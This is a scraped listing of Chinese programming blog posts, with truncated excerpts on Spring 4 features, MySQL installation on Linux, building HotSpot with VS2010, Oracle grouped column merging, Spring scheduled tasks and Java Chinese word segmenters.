Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API Spring4新
MySQL安装文档 liyong0802 mysql
工作中用到的MySQL可能安装在两种操作系统中，即Windows系统和Linux系统。以Linux系统中情况居多。安装在Windows系统时与其它Windows应用程序相同按照安装向导一直下一步就即，这里就不具体介绍，本文档只介绍Linux系统下MySQL的安装步骤。 Linux系统下安装MySQL分为三种：RPM包安装、二进制包安装和源码包安装。二
使用VS2010构建HotSpot工程 p2p2500 HotSpot OpenJDK VS2010
1. 下载OpenJDK7的源码： http://download.java.net/openjdk/jdk7 http://download.java.net/openjdk/ 2. 环境配置 ▶
Oracle实用功能之分组后列合并 seandeng888 oracle 分组实用功能合并
1 实例解析由于业务需求需要对表中的数据进行分组后进行合并的处理，鉴于Oracle10g没有现成的函数实现该功能，且该功能如若用JAVA代码实现会比较复杂，因此，特将SQL语言的实现方式分享出来，希望对大家有所帮助。如下：表test 数据如下： ID,SUBJECTCODE,DIMCODE,VALUE 1&nbs
Java定时任务注解方式实现 tuoni java spring jvm xml jni
Spring 注解的定时任务，有如下两种方式：第一种： <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http
11大Java开源中文分词器的使用方法和分词效果对比 yangshangchuan word分词器 ansj分词器 Stanford分词器 FudanNLP分词器 HanLP分词器
本文的目标有两个： 1、学会使用11大Java开源中文分词器 2、对比分析11大Java开源中文分词器的分词效果本文给出了11大Java开源中文分词的使用方法以及分词结果对比代码，至于效果哪个好，那要用的人结合自己的应用场景自己来判断。 11大Java开源中文分词器，不同的分词器有不同的用法，定义的接口也不一样，我们先定义一个统一的接口： /** * 获取文本的所有分词结果, 对比